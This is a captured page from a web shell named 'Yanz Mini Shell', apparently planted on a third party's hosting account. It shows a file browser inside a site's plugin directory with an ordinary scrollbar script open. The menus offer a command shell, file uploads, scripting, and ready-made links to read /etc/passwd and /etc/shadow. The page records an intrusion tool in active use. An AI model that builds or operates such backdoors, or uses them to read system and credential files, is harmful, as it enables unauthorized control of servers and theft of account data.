Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
sparkline
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
/** * Perfect Scrollbar */ 'use strict'; document.addEventListener('DOMContentLoaded', function () { (function () { const verticalExample = document.getElementById('vertical-example'), horizontalExample = document.getElementById('horizontal-example'), horizVertExample = document.getElementById('both-scrollbars-example'); // Vertical Example // -------------------------------------------------------------------- if (verticalExample) { new PerfectScrollbar(verticalExample, { wheelPropagation: false }); } // Horizontal Example // -------------------------------------------------------------------- if (horizontalExample) { new PerfectScrollbar(horizontalExample, { wheelPropagation: false, suppressScrollY: true }); } // Both vertical and Horizontal Example // -------------------------------------------------------------------- if (horizVertExample) { new PerfectScrollbar(horizVertExample, { wheelPropagation: false }); } })(); });
Free Space : 11677609984 Byte